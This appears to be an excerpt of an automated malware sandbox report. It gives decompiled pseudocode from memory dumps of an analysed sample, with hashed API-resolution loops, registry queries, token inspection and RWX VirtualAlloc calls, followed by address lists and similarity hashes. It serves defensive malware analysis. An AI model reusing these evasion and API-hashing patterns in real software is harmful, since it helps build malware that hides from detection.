						if(E003B15C0(0x3ab94787, 0x8883f185) != 0) {
							RegQueryValueExA( *(_t50 + 4), _t47, 0, _t53 + 0x10, 0, _t53 + 0x14); // executed
						}
						_t26 =  *(_t53 + 0x14);
						if( *(_t53 + 0x14) != 0) {
							E003C9670(_t53 + 4, _t26);
							if(E003B15C0(0x3ab94787, 0x8883f185) != 0) {
								RegQueryValueExA( *(_t50 + 4), _t47, 0, _t53 + 0x10, E003C9640(_t53 + 4, 0), _t53 + 0x14); // executed
							}
							if( *(_t53 + 0x10) == 4) {
								E003C97D0(_t53 + 8, _t53 + 0x18, 4);
							}
						}
					}
					goto L10;
				}
			}

0x003cc798
0x003cc79c
0x003cc79e
0x003cc7a3
0x003cc7a8
0x003cc7ad
0x003cc7b8
0x003cc7b4
0x003cc7b4
0x003cc7b4
0x003cc7bf
0x003cc805
0x003cc80c
0x003cc819
0x003cc7c1
0x003cc7c1
0x003cc7c7
0x003cc7ce
0x003cc7d2
0x003cc7e9
0x003cc7fb
0x003cc7fb
0x003cc7fd
0x003cc803
0x003cc821
0x003cc839
0x003cc85a
0x003cc85a
0x003cc861
0x003cc86e
0x003cc86e
0x003cc861
0x003cc803
0x00000000
0x003cc7c7

APIs

RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,8883F185,00000000), ref: 003CC7FB
RegQueryValueExA.KERNEL32(?,?,00000000,8883F185,00000000,00000000,00000000,8883F185,?,8883F185,00000000), ref: 003CC85A

Memory Dump Source

Source File: 00000004.00000002.2392646074.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: true

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 1b4fde19d6e27f85aaca9c95f26fbe1a7904d47f24c8b1bb7409f34fb5227349
Instruction ID: 7433de7e064b6ee8756130ae76031e81033b29b9031042c2d83362c957c2e2a7
Opcode Fuzzy Hash: 1b4fde19d6e27f85aaca9c95f26fbe1a7904d47f24c8b1bb7409f34fb5227349
Instruction Fuzzy Hash: 43217F31614316ABD722EE24CC55FAB77A8DF91B10F05092EF549DA191EB30DD09CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 0025B1B0, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 0025B234

Strings

VirtualAlloc, xrefs: 0025B219, 0025B21C

Memory Dump Source

Source File: 00000004.00000002.2392508044.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Similarity

API ID: AllocVirtual
String ID: VirtualAlloc
API String ID: 4275171209-164498762
Opcode ID: 28e58905486cc54ceb0c66d9f59e735f8340f5baddf7968a63ebffb8cdc22c52
Instruction ID: bd45cbafa15cf6b7337475aa336f8d9ce94dcdcd961cc585c082ee2f668f62cc
Opcode Fuzzy Hash: 28e58905486cc54ceb0c66d9f59e735f8340f5baddf7968a63ebffb8cdc22c52
Instruction Fuzzy Hash: 03113060D0828DDEEB01D7E88409BEEBFB55B11705F044098D9446A282D6BA57588BB6

Uniqueness

Uniqueness Score: -1.00%

Function 003B47B0, Relevance: 2.1, APIs: 1, Instructions: 618
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E003B47B0(void* __ebx, intOrPtr __edi, intOrPtr __esi) {
				void* _t93;
				long _t99;
				void* _t109;
				void* _t110;
				intOrPtr _t118;
				char _t133;
				intOrPtr _t141;
				void* _t144;
				void* _t149;
				intOrPtr _t150;
				intOrPtr _t155;
				void* _t158;
				void* _t161;
				intOrPtr _t163;
				void* _t166;
				void* _t169;
				int _t174;
				intOrPtr _t179;
				void* _t182;
				void* _t185;
				void* _t194;
				void* _t196;
				void* _t198;
				void* _t199;
				void* _t202;
				void* _t203;
				intOrPtr* _t205;
				void* _t206;
				long _t207;
				void* _t209;
				void* _t213;
				void* _t214;
				void* _t233;
				void* _t235;
				void* _t236;
				void* _t237;
				void* _t238;
				void* _t239;
				void* _t242;
				void* _t243;
				void* _t245;
				long _t246;
				intOrPtr* _t248;
				long _t249;
				long _t250;
				long _t253;
				long _t255;
				long _t258;
				long _t259;
				long _t261;
				intOrPtr _t266;
				long _t267;
				intOrPtr _t270;
				intOrPtr _t272;
				intOrPtr* _t273;
				intOrPtr* _t277;
				intOrPtr* _t278;
				void* _t281;
				signed int _t283;
				void* _t284;
				void* _t285;

				_t272 = __esi;
				_t270 = __edi;
				_t285 = _t284 - 0x38;
				_t246 =  *0x3db1f4; // 0x2661568
				 *(_t285 + 0x34) = 0;
				if(_t246 == 0xc139578) {
					 *0x3db1f4 = 0;
					goto L6;
				} else {
					if(_t246 == 0) {
						L6:
						_push(0x3ab94787);
						_t196 = E003B7564(0x3ab94787);
						if(_t196 == 0) {
							if(E003B6C50(0x3ab94787) != 0) {
								_push(0x3ab94787);
								_t196 = E003B7564(0x3ab94787);
							}
						}
						if(_t196 == 0) {
							goto L25;
						} else {
							_t285 = _t285 + 0xfffffff8;
							_t248 = E003B67C8(_t196, 0xc17c5a6e);
							goto L9;
						}
					} else {
						do {
							_t245 = 0;
							_t194 = 0;
							while( *((intOrPtr*)(_t194 + _t246 + 8)) != 0xc17c5a6e) {
								_t245 = _t245 + 1;
								_t194 = _t194 + 0x18;
								if(_t245 < 0x10) {
									continue;
								} else {
									goto L5;
								}
								goto L186;
							}
							_t248 =  *((intOrPtr*)(_t194 + _t246 + 0x14));
							if(_t248 != 0) {
								L9:
								if(_t248 == 0) {
									L25:
									return 0;
								} else {
									_push(_t285 + 0x34);
									_push(8);
									_push(0xffffffff);
									if( *_t248() == 0) {
										_t93 = E003B7BF0(0xea5f6acc, _t272, 0xea5f6acc);
										if(_t93 != 0) {
											L174:
											if(_t93 == 0) {
												goto L178;
											} else {
												asm("int3");
												return _t93;
											}
										} else {
											_push(0xa1310f65);
											_t214 = E003B7564(0xa1310f65);
											if(_t214 == 0) {
												if(E003B6C50(0xa1310f65) != 0) {
													_push(0xa1310f65);
													_t214 = E003B7564(0xa1310f65);
												}
											}
											if(_t214 == 0) {
												L178:
												if(0 != 0) {
													goto L25;
												} else {
													goto L11;
												}
											} else {
												_t285 = _t285 + 0xfffffff8;
												_t93 = E003B67C8(_t214, 0xea5f6acc);
												goto L174;
											}
										}
									} else {
										L11:
										_t249 =  *0x3db1f4; // 0x2661568
										 *(_t285 + 0x28) =  *(_t285 + 0x34);
										 *((char*)(_t285 + 0x2c)) = 1;
										 *(_t285 + 0x30) = 0;
										if(_t249 == 0xc139578) {
											 *0x3db1f4 = 0;
											goto L17;
										} else {
											if(_t249 == 0) {
												L17:
												_push(0x3ab94787);
												_t198 = E003B7564(0x3ab94787);
												if(_t198 == 0) {
													if(E003B6C50(0x3ab94787) != 0) {
														_push(0x3ab94787);
														_t198 = E003B7564(0x3ab94787);
													}
												}
												if(_t198 == 0) {
													goto L22;
												} else {
													_t285 = _t285 + 0xfffffff8;
													_t266 = E003B67C8(_t198, 0x2eeff4c6);
													goto L20;
												}
											} else {
												do {
													_t243 = 0;
													_t185 = 0;
													while( *((intOrPtr*)(_t185 + _t249 + 8)) != 0x2eeff4c6) {
														_t243 = _t243 + 1;
														_t185 = _t185 + 0x18;
														if(_t243 < 0x10) {
															continue;
														} else {
															goto L16;
														}
														goto L186;
													}
													_t266 =  *((intOrPtr*)(_t185 + _t249 + 0x14));
													if(_t266 != 0) {
														L20:
														if(_t266 == 0) {
															L22:
															_t99 =  *(_t285 + 0x30);
															if(_t99 != 0) {
																_push(_t99);
																E003C9350(_t285 + 4);
																_t250 =  *0x3db1f4; // 0x2661568
																if(_t250 == 0xc139578) {
																	 *0x3db1f4 = 0;
																	goto L32;
																} else {
																	if(_t250 == 0) {
																		L32:
																		_push(0x3ab94787);
																		_t199 = E003B7564(0x3ab94787);
																		if(_t199 == 0) {
																			if(E003B6C50(0x3ab94787) != 0) {
																				_push(0x3ab94787);
																				_t199 = E003B7564(0x3ab94787);
																			}
																		}
																		if(_t199 == 0) {
																			goto L36;
																		} else {
																			_t285 = _t285 + 0xfffffff8;
																			_t277 = E003B67C8(_t199, 0x2eeff4c6);
																			goto L35;
																		}
																	} else {
																		do {
																			_t239 = 0;
																			_t169 = 0;
																			while( *((intOrPtr*)(_t169 + _t250 + 8)) != 0x2eeff4c6) {
																				_t239 = _t239 + 1;
																				_t169 = _t169 + 0x18;
																				if(_t239 < 0x10) {
																					continue;
																				} else {
																					goto L31;
																				}
																				goto L186;
																			}
																			_t277 =  *((intOrPtr*)(_t169 + _t250 + 0x14));
																			if(_t277 != 0) {
																				L35:
																				if(_t277 != 0) {
																					_t109 = E003C9640(_t285 + 4, 0);
																					_t110 = E003C9650(_t285);
																					_push(_t285 + 0x30);
																					_push(_t110);
																					_push(_t109);
																					_push(2);
																					_push( *(_t285 + 0x44));
																					if( *_t277() == 0) {
																						_t253 =  *0x3db1f4; // 0x2661568
																						if(_t253 == 0xc139578) {
																							 *0x3db1f4 = 0;
																							goto L131;
																						} else {
																							if(_t253 == 0) {
																								L131:
																								_push(0xa1310f65);
																								_t202 = E003B7564(0xa1310f65);
																								if(_t202 == 0) {
																									if(E003B6C50(0xa1310f65) != 0) {
																										_push(0xa1310f65);
																										_t202 = E003B7564(0xa1310f65);
																									}
																								}
																								if(_t202 == 0) {
																									goto L138;
																								} else {
																									_t285 = _t285 + 0xfffffff8;
																									_t163 = E003B67C8(_t202, 0xea5f6acc);
																									goto L134;
																								}
																							} else {
																								do {
																									_t238 = 0;
																									_t166 = 0;
																									while( *((intOrPtr*)(_t166 + _t253 + 8)) != 0xea5f6acc) {
																										_t238 = _t238 + 1;
																										_t166 = _t166 + 0x18;
																										if(_t238 < 0x10) {
																											continue;
																										} else {
																											goto L130;
																										}
																										goto L186;
																									}
																									_t163 =  *((intOrPtr*)(_t166 + _t253 + 0x14));
																									if(_t163 != 0) {
																										L134:
																										if(_t163 == 0) {
																											L138:
																											if(0 != 0) {
																												goto L36;
																											} else {
																												goto L40;
																											}
																										} else {
																											asm("int3");
																											return _t163;
																										}
																									} else {
																										goto L131;
																									}
																									goto L186;
																									L130:
																									asm("o16 nop [eax+eax]");
																									_t70 = _t253 + 0x180; // 0x26890a8
																									_t253 =  *_t70;
																								} while (_t253 != 0);
																								goto L131;
																							}
																						}
																					} else {
																						L40:
																						_t278 = E003C9640(_t285 + 4, 0);
																						_t118 =  *0x3da148; // 0x0
																						 *((short*)(_t285 + 0x14)) =  *0x3da14c & 0x0000ffff;
																						_t255 =  *0x3db1f4; // 0x2661568
																						 *(_t285 + 0x24) = 0;
																						 *((intOrPtr*)(_t285 + 0x10)) = _t118;
																						if(_t255 == 0xc139578) {
																							 *0x3db1f4 = 0;
																							goto L46;
																						} else {
																							if(_t255 == 0) {
																								L46:
																								_push(0x3ab94787);
																								_t203 = E003B7564(0x3ab94787);
																								if(_t203 == 0) {
																									if(E003B6C50(0x3ab94787) != 0) {
																										_push(0x3ab94787);
																										_t203 = E003B7564(0x3ab94787);
																									}
																								}
																								if(_t203 == 0) {
																									goto L87;
																								} else {
																									_t285 = _t285 + 0xfffffff8;
																									_t205 = E003B67C8(_t203, 0xff8924ad);
																									goto L49;
																								}
																							} else {
																								do {
																									_t237 = 0;
																									_t161 = 0;
																									while( *((intOrPtr*)(_t161 + _t255 + 8)) != 0xff8924ad) {
																										_t237 = _t237 + 1;
																										_t161 = _t161 + 0x18;
																										if(_t237 < 0x10) {
																											continue;
																										} else {
																											goto L45;
																										}
																										goto L186;
																									}
																									_t205 =  *((intOrPtr*)(_t161 + _t255 + 0x14));
																									if(_t205 != 0) {
																										L49:
																										if(_t205 == 0) {
																											L87:
																											E003C9510(_t285);
																											if( *((char*)(_t285 + 0x2c)) != 0) {
																												E003CBE30(_t285 + 0x28, _t272);
																											}
																											return 0;
																										} else {
																											_push(_t285 + 0x24);
																											_push(0);
																											_push(0);
																											_push(0);
																											_push(0);
																											_push(0);
																											_push(0);
																											_push(0x220);
																											_push(0x20);
																											_push(2);
																											_push(_t285 + 0x10);
																											if( *_t205() == 0) {
																												_t258 =  *0x3db1f4; // 0x2661568
																												if(_t258 == 0xc139578) {
																													 *0x3db1f4 = 0;
																													goto L107;
																												} else {
																													if(_t258 == 0) {
																														L107:
																														_push(0xa1310f65);
																														_t206 = E003B7564(0xa1310f65);
																														if(_t206 == 0) {
																															if(E003B6C50(0xa1310f65) != 0) {
																																_push(0xa1310f65);
																																_t206 = E003B7564(0xa1310f65);
																															}
																														}
																														if(_t206 == 0) {
																															goto L114;
																														} else {
																															_t285 = _t285 + 0xfffffff8;
																															_t155 = E003B67C8(_t206, 0xea5f6acc);
																															goto L110;
																														}
																													} else {
																														do {
																															_t236 = 0;
																															_t158 = 0;
																															while( *((intOrPtr*)(_t158 + _t258 + 8)) != 0xea5f6acc) {
																																_t236 = _t236 + 1;
																																_t158 = _t158 + 0x18;
																																if(_t236 < 0x10) {
																																	continue;
																																} else {
																																	goto L106;
																																}
																																goto L186;
																															}
																															_t155 =  *((intOrPtr*)(_t158 + _t258 + 0x14));
																															if(_t155 != 0) {
																																L110:
																																if(_t155 == 0) {
																																	L114:
																																	if(0 != 0) {
																																		goto L87;
																																	} else {
																																		goto L51;
																																	}
																																} else {
																																	asm("int3");
																																	return _t155;
																																}
																															} else {
																																goto L107;
																															}
																															goto L186;
																															L106:
																															asm("o16 nop [eax+eax]");
																															_t63 = _t258 + 0x180; // 0x26890a8
																															_t258 =  *_t63;
																														} while (_t258 != 0);
																														goto L107;
																													}
																												}
																											} else {
																												L51:
																												_t207 =  *(_t285 + 0x24);
																												if( *_t278 <= 0) {
																													L67:
																													if(_t207 == 0 || _t207 == 0xffffffff) {
																														_t133 = 1;
																													} else {
																														_t133 = 0;
																													}
																													if(_t133 != 0) {
																														L84:
																														E003C9510(_t285);
																														if( *((char*)(_t285 + 0x2c)) != 0) {
																															E003CBE30(_t285 + 0x28, _t272);
																														}
																														return 0;
																													} else {
																														_t259 =  *0x3db1f4; // 0x2661568
																														if(_t259 == 0xc139578) {
																															 *0x3db1f4 = 0;
																															goto L79;
																														} else {
																															if(_t259 == 0) {
																																L79:
																																_push(0x3ab94787);
																																_t281 = E003B7564(0x3ab94787);
																																if(_t281 == 0) {
																																	if(E003B6C50(0x3ab94787) != 0) {
																																		_push(0x3ab94787);
																																		_t281 = E003B7564(0x3ab94787);
																																	}
																																}
																																if(_t281 == 0) {
																																	goto L84;
																																} else {
																																	_t285 = _t285 + 0xfffffff8;
																																	_t141 = E003B67C8(_t281, 0x9d775c6);
																																	goto L82;
																																}
																															} else {
																																do {
																																	_t233 = 0;
																																	_t144 = 0;
																																	while( *((intOrPtr*)(_t144 + _t259 + 8)) != 0x9d775c6) {
																																		_t233 = _t233 + 1;
																																		_t144 = _t144 + 0x18;
																																		if(_t233 < 0x10) {
																																			continue;
																																		} else {
																																			goto L78;
																																		}
																																		goto L186;
																																	}
																																	_t141 =  *((intOrPtr*)(_t144 + _t259 + 0x14));
																																	if(_t141 != 0) {
																																		L82:
																																		if(_t141 == 0) {
																																			goto L84;
																																		} else {
																																			_push(_t207);
																																			asm("int3");
																																			return _t141;
																																		}
																																	} else {
																																		goto L79;
																																	}
																																	goto L186;
																																	L78:
																																	asm("o16 nop [eax+eax]");
																																	_t52 = _t259 + 0x180; // 0x26890a8
																																	_t259 =  *_t52;
																																} while (_t259 != 0);
																																goto L79;
																															}
																														}
																													}
																												} else {
																													 *(_t285 + 0x18) = _t207;
																													 *((intOrPtr*)(_t285 + 0x1c)) = _t272;
																													_t273 = _t278;
																													 *((intOrPtr*)(_t285 + 0x20)) = _t270;
																													_t283 = 0;
																													do {
																														_t261 =  *0x3db1f4; // 0x2661568
																														if(_t261 == 0xc139578) {
																															 *0x3db1f4 = 0;
																															goto L60;
																														} else {
																															if(_t261 == 0) {
																																L60:
																																_push(0x3ab94787);
																																_t209 = E003B7564(0x3ab94787);
																																if(_t209 == 0) {
																																	if(E003B6C50(0x3ab94787) != 0) {
																																		_push(0x3ab94787);
																																		_t209 = E003B7564(0x3ab94787);
																																	}
																																}
																																if(_t209 == 0) {
																																	goto L65;
																																} else {
																																	_t285 = _t285 + 0xfffffff8;
																																	_t150 = E003B67C8(_t209, 0x68adfb76);
																																	goto L63;
																																}
																															} else {
																																do {
																																	_t235 = 0;
																																	_t149 = 0;
																																	while( *((intOrPtr*)(_t149 + _t261 + 8)) != 0x68adfb76) {
																																		_t235 = _t235 + 1;
																																		_t149 = _t149 + 0x18;
																																		if(_t235 < 0x10) {
																																			continue;
																																		} else {
																																			goto L59;
																																		}
																																		goto L186;
																																	}
																																	_t150 =  *((intOrPtr*)(_t149 + _t261 + 0x14));
																																	if(_t150 != 0) {
																																		L63:
																																		if(_t150 == 0) {
																																			goto L65;
																																		} else {
																																			_push( *((intOrPtr*)(_t273 + 4 + _t283 * 8)));
																																			_push( *(_t285 + 0x28));
																																			asm("int3");
																																			return _t150;
																																		}
																																	} else {
																																		goto L60;
																																	}
																																	goto L186;
																																	L59:
																																	asm("o16 nop [eax+eax]");
																																	_t42 = _t261 + 0x180; // 0x26890a8
																																	_t261 =  *_t42;
																																} while (_t261 != 0);
																																goto L60;
																															}
																														}
																														goto L186;
																														L65:
																														_t283 = _t283 + 1;
																													} while (_t283 <  *_t273);
																													_t207 =  *(_t285 + 0x18);
																													_t272 =  *((intOrPtr*)(_t285 + 0x1c));
																													goto L67;
																												}
																											}
																										}
																									} else {
																										goto L46;
																									}
																									goto L186;
																									L45:
																									asm("o16 nop [eax+eax]");
																									_t33 = _t255 + 0x180; // 0x26890a8
																									_t255 =  *_t33;
																								} while (_t255 != 0);
																								goto L46;
																							}
																						}
																					}
																				} else {
																					L36:
																					E003C9510(_t285);
																					if( *((char*)(_t285 + 0x2c)) != 0) {
																						E003CBE30(_t285 + 0x28, _t272);
																					}
																					return 0;
																				}
																			} else {
																				goto L32;
																			}
																			goto L186;
																			L31:
																			asm("o16 nop [eax+eax]");
																			_t21 = _t250 + 0x180; // 0x26890a8
																			_t250 =  *_t21;
																		} while (_t250 != 0);
																		goto L32;
																	}
																}
															} else {
																if( *((char*)(_t285 + 0x2c)) != 0) {
																	E003CBE30(_t285 + 0x28, _t272);
																}
																goto L25;
															}
														} else {
															_t174 = GetTokenInformation( *(_t285 + 0x44), 2, 0, 0, _t285 + 0x30); // executed
															if(_t174 == 0) {
																_t267 =  *0x3db1f4; // 0x2661568
																if(_t267 == 0xc139578) {
																	 *0x3db1f4 = 0;
																	goto L155;
																} else {
																	if(_t267 == 0) {
																		L155:
																		_push(0xa1310f65);
																		_t213 = E003B7564(0xa1310f65);
																		if(_t213 == 0) {
																			if(E003B6C50(0xa1310f65) != 0) {
																				_push(0xa1310f65);
																				_t213 = E003B7564(0xa1310f65);
																			}
																		}
																		if(_t213 == 0) {
																			goto L22;
																		} else {
																			_t285 = _t285 + 0xfffffff8;
																			_t179 = E003B67C8(_t213, 0xea5f6acc);
																			goto L158;
																		}
																	} else {
																		do {
																			_t242 = 0;
																			_t182 = 0;
																			while( *((intOrPtr*)(_t182 + _t267 + 8)) != 0xea5f6acc) {
																				_t242 = _t242 + 1;
																				_t182 = _t182 + 0x18;
																				if(_t242 < 0x10) {
																					continue;
																				} else {
																					goto L154;
																				}
																				goto L186;
																			}
																			_t179 =  *((intOrPtr*)(_t182 + _t267 + 0x14));
																			if(_t179 != 0) {
																				L158:
																				if(_t179 == 0) {
																					goto L22;
																				} else {
																					asm("int3");
																					return _t179;
																				}
																			} else {
																				goto L155;
																			}
																			goto L186;
																			L154:
																			asm("o16 nop [eax+eax]");
																			_t77 = _t267 + 0x180; // 0x26890a8
																			_t267 =  *_t77;
																		} while (_t267 != 0);
																		goto L155;
																	}
																}
															} else {
																goto L22;
															}
														}
													} else {
														goto L17;
													}
													goto L186;
													L16:
													asm("o16 nop [eax+eax]");
													_t12 = _t249 + 0x180; // 0x26890a8
													_t249 =  *_t12;
												} while (_t249 != 0);
												goto L17;
											}
										}
									}
								}
							} else {
								goto L6;
							}
							goto L186;
							L5:
							asm("o16 nop [eax+eax]");
							_t4 = _t246 + 0x180; // 0x26890a8
							_t246 =  *_t4;
						} while (_t246 != 0);
						goto L6;
					}
				}
				L186:
			}

0x003b47b0
0x003b47b0
0x003b47b2
0x003b47b5
0x003b47bb
0x003b47c9
0x003b50e3
0x00000000
0x003b47cf
0x003b47d1
0x003b47fe
0x003b4803
0x003b4809
0x003b480d
0x003b50ba
0x003b50c5
0x003b50cb
0x003b50cb
0x003b50ba
0x003b4815
0x00000000
0x003b481b
0x003b4822
0x003b482a
0x00000000
0x003b482a
0x003b47d3
0x003b47d3
0x003b47d3
0x003b47d5
0x003b47d7
0x003b47e5
0x003b47e6
0x003b47ec
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003b47ec
0x003b50d2
0x003b50d8
0x003b482c
0x003b482e
0x003b48fc
0x003b4903
0x003b4834
0x003b4838
0x003b4839
0x003b483b
0x003b4841
0x003b504d
0x003b5054
0x003b507a
0x003b507c
0x00000000
0x003b507e
0x003b507e
0x003b507f
0x003b507f
0x003b5056
0x003b505b
0x003b5061
0x003b5065
0x003b509d
0x003b50a4
0x003b50aa
0x003b50aa
0x003b509d
0x003b5069
0x003b508d
0x003b5082
0x00000000
0x003b5088
0x00000000
0x003b5088
0x003b506b
0x003b5072
0x003b5075
0x00000000
0x003b5075
0x003b5069
0x003b4847
0x003b4847
0x003b484b
0x003b4851
0x003b4855
0x003b485a
0x003b4868
0x003b5038
0x00000000
0x003b486e
0x003b4870
0x003b489d
0x003b48a2
0x003b48a8
0x003b48ac
0x003b500f
0x003b501a
0x003b5020
0x003b5020
0x003b500f
0x003b48b4
0x00000000
0x003b48b6
0x003b48bd
0x003b48c5
0x00000000
0x003b48c5
0x003b4872
0x003b4872
0x003b4872
0x003b4874
0x003b4876
0x003b4884
0x003b4885
0x003b488b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003b488b
0x003b5027
0x003b502d
0x003b48c7
0x003b48c9
0x003b48e4
0x003b48e4
0x003b48ea
0x003b4904
0x003b4909
0x003b490e
0x003b491a
0x003b4f51
0x00000000
0x003b4920
0x003b4922
0x003b494f
0x003b4954
0x003b495a
0x003b495e
0x003b4f28
0x003b4f33
0x003b4f39
0x003b4f39
0x003b4f28
0x003b4966
0x00000000
0x003b4968
0x003b496f
0x003b4977
0x00000000
0x003b4977
0x003b4924
0x003b4924
0x003b4924
0x003b4926
0x003b4928
0x003b4936
0x003b4937
0x003b493d
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003b493d
0x003b4f40
0x003b4f46
0x003b4979
0x003b497b
0x003b49a3
0x003b49ad
0x003b49b8
0x003b49b9
0x003b49ba
0x003b49bb
0x003b49bd
0x003b49c5
0x003b4e71
0x003b4e7d
0x003b4f10
0x00000000
0x003b4e83
0x003b4e85
0x003b4eae
0x003b4eb3
0x003b4eb9
0x003b4ebd
0x003b4ef5
0x003b4efc
0x003b4f02
0x003b4f02
0x003b4ef5
0x003b4ec1
0x00000000
0x003b4ec3
0x003b4eca
0x003b4ecd
0x00000000
0x003b4ecd
0x003b4e87
0x003b4e87
0x003b4e87
0x003b4e89
0x003b4e8b
0x003b4e95
0x003b4e96
0x003b4e9c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003b4e9c
0x003b4f06
0x003b4f0c
0x003b4ed2
0x003b4ed4
0x003b4ee5
0x003b4eda
0x00000000
0x003b4ee0
0x00000000
0x003b4ee0
0x003b4ed6
0x003b4ed6
0x003b4ed7
0x003b4ed7
0x003b4f0e
0x00000000
0x003b4f0e
0x00000000
0x003b4e9e
0x003b4e9e
0x003b4ea4
0x003b4ea4
0x003b4eaa
0x00000000
0x003b4e87
0x003b4e85
0x003b49cb
0x003b49cb
0x003b49d6
0x003b49df
0x003b49e4
0x003b49e9
0x003b49ef
0x003b49f7
0x003b4a01
0x003b4e62
0x00000000
0x003b4a07
0x003b4a09
0x003b4a36
0x003b4a3b
0x003b4a41
0x003b4a45
0x003b4e39
0x003b4e44
0x003b4e4a
0x003b4e4a
0x003b4e39
0x003b4a4d
0x00000000
0x003b4a53
0x003b4a5a
0x003b4a62
0x00000000
0x003b4a62
0x003b4a0b
0x003b4a0b
0x003b4a0b
0x003b4a0d
0x003b4a0f
0x003b4a1d
0x003b4a1e
0x003b4a24
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003b4a24
0x003b4e51
0x003b4e57
0x003b4a64
0x003b4a66
0x003b4bef
0x003b4bf2
0x003b4bfc
0x003b4c02
0x003b4c02
0x003b4c0e
0x003b4a6c
0x003b4a76
0x003b4a77
0x003b4a78
0x003b4a79
0x003b4a7a
0x003b4a7b
0x003b4a7c
0x003b4a7d
0x003b4a82
0x003b4a84
0x003b4a86
0x003b4a8b
0x003b4d80
0x003b4d8c
0x003b4e21
0x00000000
0x003b4d92
0x003b4d94
0x003b4dbf
0x003b4dc4
0x003b4dca
0x003b4dce
0x003b4e06
0x003b4e0d
0x003b4e13
0x003b4e13
0x003b4e06
0x003b4dd2
0x00000000
0x003b4dd4
0x003b4ddb
0x003b4dde
0x00000000
0x003b4dde
0x003b4d96
0x003b4d98
0x003b4d98
0x003b4d9a
0x003b4d9c
0x003b4da6
0x003b4da7
0x003b4dad
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003b4dad
0x003b4e17
0x003b4e1d
0x003b4de3
0x003b4de5
0x003b4df6
0x003b4deb
0x00000000
0x003b4df1
0x00000000
0x003b4df1
0x003b4de7
0x003b4de7
0x003b4de8
0x003b4de8
0x003b4e1f
0x00000000
0x003b4e1f
0x00000000
0x003b4daf
0x003b4daf
0x003b4db5
0x003b4db5
0x003b4dbb
0x00000000
0x003b4d98
0x003b4d94
0x003b4a91
0x003b4a91
0x003b4a91
0x003b4a99
0x003b4b47
0x003b4b49
0x003b4b54
0x003b4b50
0x003b4b50
0x003b4b50
0x003b4b5b
0x003b4bcf
0x003b4bd2
0x003b4bdc
0x003b4be2
0x003b4be2
0x003b4bee
0x003b4b5d
0x003b4b5d
0x003b4b69
0x003b4d2d
0x00000000
0x003b4b6f
0x003b4b71
0x003b4ba0
0x003b4ba5
0x003b4bab
0x003b4baf
0x003b4d04
0x003b4d0f
0x003b4d15
0x003b4d15
0x003b4d04
0x003b4bb7
0x00000000
0x003b4bb9
0x003b4bc0
0x003b4bc3
0x00000000
0x003b4bc3
0x003b4b73
0x003b4b75
0x003b4b75
0x003b4b77
0x003b4b79
0x003b4b87
0x003b4b88
0x003b4b8e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003b4b8e
0x003b4d1c
0x003b4d22
0x003b4bc8
0x003b4bca
0x00000000
0x003b4bcc
0x003b4bcc
0x003b4bcd
0x003b4bce
0x003b4bce
0x003b4d28
0x00000000
0x003b4d28
0x00000000
0x003b4b90
0x003b4b90
0x003b4b96
0x003b4b96
0x003b4b9c
0x00000000
0x003b4b75
0x003b4b71
0x003b4b69
0x003b4a9f
0x003b4aa1
0x003b4aa5
0x003b4aa9
0x003b4aab
0x003b4aaf
0x003b4ab1
0x003b4ab1
0x003b4abd
0x003b4d71
0x00000000
0x003b4ac3
0x003b4ac5
0x003b4af4
0x003b4af9
0x003b4aff
0x003b4b03
0x003b4d48
0x003b4d53
0x003b4d59
0x003b4d59
0x003b4d48
0x003b4b0b
0x00000000
0x003b4b0d
0x003b4b14
0x003b4b17
0x00000000
0x003b4b17
0x003b4ac7
0x003b4ac9
0x003b4ac9
0x003b4acb
0x003b4acd
0x003b4adb
0x003b4adc
0x003b4ae2
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003b4ae2
0x003b4d60
0x003b4d66
0x003b4b1c
0x003b4b1e
0x00000000
0x003b4b20
0x003b4b20
0x003b4b24
0x003b4b28
0x003b4b29
0x003b4b29
0x003b4d6c
0x00000000
0x003b4d6c
0x00000000
0x003b4ae4
0x003b4ae4
0x003b4aea
0x003b4aea
0x003b4af0
0x00000000
0x003b4ac9
0x003b4ac5
0x00000000
0x003b4b32
0x003b4b32
0x003b4b33
0x003b4b3b
0x003b4b3f
0x00000000
0x003b4b43
0x003b4a99
0x003b4a8b
0x003b4e5d
0x00000000
0x003b4e5d
0x00000000
0x003b4a26
0x003b4a26
0x003b4a2c
0x003b4a2c
0x003b4a32
0x00000000
0x003b4a0b
0x003b4a09
0x003b4a01
0x003b497d
0x003b497d
0x003b4980
0x003b498a
0x003b4990
0x003b4990
0x003b499c
0x003b499c
0x003b4f4c
0x00000000
0x003b4f4c
0x00000000
0x003b493f
0x003b493f
0x003b4945
0x003b4945
0x003b494b
0x00000000
0x003b4924
0x003b4922
0x003b48ec
0x003b48f1
0x003b48f7
0x003b48f7
0x00000000
0x003b48f1
0x003b48cb
0x003b48da
0x003b48de
0x003b4f60
0x003b4f6c
0x003b4fda
0x00000000
0x003b4f6e
0x003b4f70
0x003b4f99
0x003b4f9e
0x003b4fa4
0x003b4fa8
0x003b4ff2
0x003b4ff9
0x003b4fff
0x003b4fff
0x003b4ff2
0x003b4fac
0x00000000
0x003b4fb2
0x003b4fb9
0x003b4fbc
0x00000000
0x003b4fbc
0x003b4f72
0x003b4f72
0x003b4f72
0x003b4f74
0x003b4f76
0x003b4f80
0x003b4f81
0x003b4f87
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003b4f87
0x003b4fd0
0x003b4fd6
0x003b4fc1
0x003b4fc3
0x00000000
0x003b4fc9
0x003b4fc9
0x003b4fca
0x003b4fca
0x003b4fd8
0x00000000
0x003b4fd8
0x00000000
0x003b4f89
0x003b4f89
0x003b4f8f
0x003b4f8f
0x003b4f95
0x00000000
0x003b4f72
0x003b4f70
0x00000000
0x00000000
